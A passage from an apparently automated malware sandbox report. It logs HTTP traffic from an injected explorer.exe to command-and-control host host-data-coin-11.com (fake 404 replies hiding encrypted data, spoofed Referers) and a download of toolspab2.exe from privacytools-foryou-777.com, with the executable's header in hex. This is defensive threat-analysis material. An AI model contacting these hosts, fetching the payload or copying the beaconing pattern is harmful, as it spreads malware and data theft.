                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 209
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:22:55.349338055 CET1022INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:22:55 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 0d 0a 14 00 00 00 7b fa f7 1c b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 19{i+,GO0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        12192.168.2.3497465.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:22:55.763552904 CET1023OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://iqsorlppj.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 360
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:22:55.875713110 CET1023INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:22:55 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 46I:82OOjpYJRg%XQAc}yc0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        13192.168.2.3497475.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:22:56.268134117 CET1025OUTGET /downloads/toolspab2.exe HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Host: privacytools-foryou-777.com
                                                                                                                                                        Dec 28, 2021 03:22:56.363398075 CET1026INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:22:56 GMT
                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                        Content-Length: 339456
                                                                                                                                                        Connection: close
                                                                                                                                                        Last-Modified: Tue, 28 Dec 2021 02:22:02 GMT
                                                                                                                                                        ETag: "52e00-5d42b7c9c3233"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 b7 bc 92 40 d6 d2 c1 40 d6 d2 c1 40 d6 d2 c1 2f a0 4c c1 51 d6 d2 c1 2f a0 78 c1 2a d6 d2 c1 49 ae 41 c1 43 d6 d2 c1 40 d6 d3 c1 fd d6 d2 c1 2f a0 79 c1 76 d6 d2 c1 2f a0 48 c1 41 d6 d2 c1 2f a0 4f c1 41 d6 d2 c1 52 69 63 68 40 d6 d2 c1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 6e f4 01 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ee 03 00 00 20 09 00 00 00 00 00 70 3c 02 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 0d 00 00 04 00 00 bc 9e 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c ea 03 00 28 00 00 00 00 90 0c 00 88 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 24 21 00 00 70 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 a5 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e ec 03 00 00 10 00 00 00 ee 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 6f 08 00 00 00 04 00 00 8c 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 73 69 6b 75 7a 00 00 05 00 00 00 00 70 0c 00 00 02 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 65 67 65 6e 65 00 93 0d 00 00 00 80 0c 00 00 0e 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 62 00 00 00 90 0c 00 00 64 00 00 00 8e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ee 3b 00 00 00 00 0d 00 00 3c 00 00 00 f2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c ed 03 00 b8 ed 03 00 cc ed 03 00 de ed 03 00 f0 ed 03 00 06 ee 03 00 16 ee 03 00 2c ee 03 00 3c ee 03 00 58 ee 03 00 6c ee 03 00 80 ee 03 00 96 ee 03 00 b0
                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$@@@/LQ/x*IAC@/yv/HA/OARich@PELn_ p<@@(b$!p@.text `.dataho@.sikuzp~@.begene@.rsrcbd@@.reloc;<@B,<Xl


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        14192.168.2.3497495.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:22:58.454504967 CET1380OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://ynjhvuqfxb.net/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 354
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:22:58.575953007 CET1390INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:22:58 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        15192.168.2.3497515.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:22:58.997113943 CET1392OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://ltxeprficx.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 203
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:22:59.117098093 CET1393INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:22:59 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        16192.168.2.3497525.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:22:59.311822891 CET1394OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://ggafm.com/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 259
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:22:59.429023027 CET1395INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:22:59 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        17192.168.2.3497535.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:22:59.535959005 CET1396OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://ruicmqoob.net/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 138
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:22:59.657628059 CET1396INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:22:59 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        18192.168.2.3497545.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:22:59.766622066 CET1397OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://fsddvkyhh.com/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 298
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:22:59.883130074 CET1399INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:22:59 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        19192.168.2.3497565.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:22:59.989552975 CET1404OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://ivcrcx.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 169
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:00.111670971 CET1405INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:00 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 2dI:82OI:J_J-WS,/0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        2192.168.2.349854104.192.141.1443C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        20192.168.2.3497605.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:01.546087980 CET1608OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://hewpcmebv.com/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 167
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:01.665252924 CET1614INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:01 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                        21192.168.2.3497625.188.89.4880C:\Windows\explorer.exe
                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                        Dec 28, 2021 03:23:01.781908035 CET1624OUTPOST / HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                        Accept: */*
                                                                                                                                                        Referer: http://ypnfj.org/
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                        Content-Length: 171
                                                                                                                                                        Host: host-data-coin-11.com
                                                                                                                                                        Dec 28, 2021 03:23:01.902895927 CET1649INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Tue, 28 Dec 2021 02:23:01 GMT
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
